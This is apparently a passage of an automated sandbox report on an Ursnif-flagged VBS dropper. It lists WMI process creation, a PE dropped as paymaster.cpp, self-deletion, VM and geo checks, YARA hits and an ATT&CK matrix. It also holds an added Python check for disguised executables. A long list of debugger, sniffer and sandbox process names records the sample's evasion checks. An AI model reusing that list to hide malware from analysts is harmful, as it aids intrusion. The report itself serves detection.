Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\paymaster.cpp (dropped file)
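The report flags paymaster.cpp as a PE dropped under a source-file extension and pulls a PDB path out of it. The following Python is an added example, not code from the report or from the sample: it walks the DOS header to the PE signature to decide whether a dropped file really is an executable, compares that with the extension, and extracts PDB path strings the way the sandbox's string scan did. The PE bytes it runs on are a constructed minimal header carrying the connect.pdb path quoted above, not the real dropped file; the extension list and the function names are my assumptions.

```python
"""Content-versus-extension check for dropped files, plus PDB path extraction.
Added example, not code from the report or the sample."""
import os
import re
import struct

# Extensions under which a PE image is expected (assumption, extend as needed).
PE_EXTENSIONS = {".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl", ".drv", ".efi", ".mui"}
MACHINES = {0x014C: "x86", 0x8664: "x64", 0x01C4: "ARMv7", 0xAA64: "ARM64"}


def parse_pe_header(data):
    """Return (is_pe, machine) by following IMAGE_DOS_HEADER.e_lfanew to the PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False, None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 6 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return False, None
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
    return True, MACHINES.get(machine, "unknown(0x%04x)" % machine)


def find_pdb_paths(data):
    """Printable ASCII strings of the form <drive>:\\...\\name.pdb, as reported by the sandbox."""
    return [m.decode("ascii")
            for m in re.findall(rb"[A-Za-z]:\\[\x20-\x7e]{1,250}?\.pdb", data)]


def classify_dropped_file(path, data):
    """Flag a PE whose extension does not say it is one; report arch and PDB paths."""
    ext = os.path.splitext(path)[1].lower()
    is_pe, machine = parse_pe_header(data)
    return {
        "path": path,
        "is_pe": is_pe,
        "machine": machine,
        "extension_mismatch": is_pe and ext not in PE_EXTENSIONS,
        "pdb_paths": find_pdb_paths(data),
    }


def build_sample():
    """Constructed stand-in for paymaster.cpp (NOT the real dropped file): a DOS header
    with e_lfanew = 0x40, a PE signature with an x86 machine field, then the PDB path
    string the report quotes."""
    dos = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = b"PE\0\0" + struct.pack("<H", 0x014C) + b"\0" * 18
    pdb = b"c:\\69\\Shell\\85\\32\\And\\half\\57\\22\\80\\Neck\\62\\15\\connect.pdb\0"
    return bytes(dos) + coff + pdb


if __name__ == "__main__":
    verdict = classify_dropped_file(r"C:\Users\user\AppData\Local\Temp\paymaster.cpp", build_sample())
    for key, value in verdict.items():
        print("%-19s %s" % (key, value))
```

Running it over every file a script host writes to %TEMP% reproduces the report's "content does not match file extension" signature without depending on the sandbox.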

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match | File source: the eight process-5 memory dumps (0000000005B38000 region) listed under Key, Mouse, Clipboard, Microphone and Screen Capturing above, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe | File deleted: c:\users\user\desktop\6l4mcnj8fdjs.vbs
Source: C:\Windows\System32\wscript.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmp | Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmp | Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmp | Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmp | Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmp | Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmp | Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmp | Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmp | Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmp | Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmp | Binary or memory string: BEHAVIORDUMPER.EXE@Q
Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmp | Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmp | Binary or memory string: IMPORTREC.EXE@
Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmp | Binary or memory string: HOOKEXPLORER.EXE@
Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmp | Binary or memory string: FORTITRACER.EXE
Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmp | Binary or memory string: SBIESVC.EXEP
Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmp | Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmp | Binary or memory string: APISPY.EXE@
Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmp | Binary or memory string: IMUL.EXE@.8
Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmp | Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmp | Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmp | Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmp | Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmp | Binary or memory string: PEID.EXE@#Z
Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmp | Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmp | Binary or memory string: HOOKANAAPP.EXE@
Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmp | Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmp | Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmp | Binary or memory string: SYSANALYZER.EXE@A
Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmp | Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmp | Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmp | Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmp | Binary or memory string: SBIECTRL.EXE@
Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmp | Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmp | Binary or memory string: SCKTOOL.EXEP/
Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmp | Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmp | Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmp | Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmp | Binary or memory string: IDAG.EXE@:V
Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmp | Binary or memory string: SANDBOXIERPCSS.EXE@V5
Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmp | Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmp | Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmp | Binary or memory string: IDAQ.EXE
Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmp | Binary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXE@J
            Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
            WScript reads language and country specific registry keys (likely country aware script)
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
            Source: C:\Windows\System32\wscript.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\paymaster.cpp
            Source: C:\Windows\System32\wscript.exe TID: 6984 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
            Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
            Source: wscript.exe, 00000002.00000002.240358405.0000029CC6F50000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: wscript.exe, 00000002.00000002.240358405.0000029CC6F50000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: wscript.exe, 00000002.00000002.240358405.0000029CC6F50000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: wscript.exe, 00000002.00000002.240358405.0000029CC6F50000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

            HIPS / PFW / Operating System Protection Evasion:

            Benign windows process drops PE files
            Source: C:\Windows\System32\wscript.exe | File created: paymaster.cpp.2.dr
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmp | Binary or memory string: procmon.exe
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmp | Binary or memory string: tcpview.exe
            Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmp | Binary or memory string: wireshark.exe
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmp | Binary or memory string: avz.exe
            Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmp | Binary or memory string: cports.exe
            Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmp | Binary or memory string: lordpe.exe
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmp | Binary or memory string: icesword.exe
            Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmp | Binary or memory string: autoruns.exe
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmp | Binary or memory string: ollydbg.exe
            Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmp | Binary or memory string: regshot.exe

            Stealing of Sensitive Information:

            Yara detected Ursnif
            Source: Yara match | File source: 00000005.00000003.370902405.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.371020058.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.371053221.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.370851748.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.371038098.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.370930001.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.370994998.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.370957022.0000000005B38000.00000004.00000040.sdmp, type: MEMORY

            Remote Access Functionality:

            Yara detected Ursnif
            Source: Yara match | File source: 00000005.00000003.370902405.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.371020058.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.371053221.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.370851748.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.371038098.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.370930001.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.370994998.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.370957022.0000000005B38000.00000004.00000040.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Windows Management Instrumentation 221 | Path Interception | Process Injection 1 | Masquerading 11 | OS Credential Dumping | Query Registry 1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Scripting 121 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 4 | LSASS Memory | Security Software Discovery 241 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | Exploitation for Client Execution 1 | Logon Script (Windows) | Logon Script (Windows) | Process Injection 1 | Security Account Manager | Virtualization/Sandbox Evasion 4 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting 121 | NTDS | File and Directory Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 2 | LSA Secrets | System Information Discovery 125 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | File Deletion 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

            Behavior Graph

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet